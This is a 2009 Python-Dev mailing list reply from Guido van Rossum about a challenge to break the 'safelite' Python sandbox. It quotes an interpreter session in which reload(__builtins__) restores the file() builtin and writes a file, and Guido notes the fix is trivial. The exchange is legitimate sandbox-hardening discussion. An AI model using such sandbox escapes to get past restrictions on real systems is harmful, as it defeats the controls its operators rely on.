On Mon, Feb 23, 2009 at 1:12 PM, Victor Stinner
<victor.stin...@haypocalc.com> wrote:
>> The challenge is simple:
>>
>> * Open a fresh Python interpreter
>> * Do: >>> from safelite import FileReader
>> * You can use FileReader to read files on your filesystem
>> * Now find a way to *write* to the filesystem from your interpreter
>
> Well, the challenge is to get access to a module. And... it's quite simple :-p
>
> $ ./python
>>>> from safelite import FileReader
>>>> __builtins__.file
> Traceback (most recent call last):
> File "<stdin>", line 1, in <module>
> AttributeError: 'module' object has no attribute 'file'
>>>> reload(__builtins__)
> <module '__builtin__' (built-in)>
>>>> file('0wn3d', 'w').write('w00t\n')
>>>>
> $ cat 0wn3d
> w00t
>
>> Dinner and drinks on me for an evening -- when you are next in London
>> or I am in your town -- to the first person who manages to break
>> safelite.py and write to the filesystem.
>
> Cool. It's a good reason to go to Pycon UK this yeak ;-)
Tav should have made another stipulation: the attack must not be
trivial to fix. This one seems trivial, e.g. by adding 'reload' to the
list in secure_python_builtins().
--
--Guido van Rossum (home page: http://www.python.org/~guido/)
_______________________________________________
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe:
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
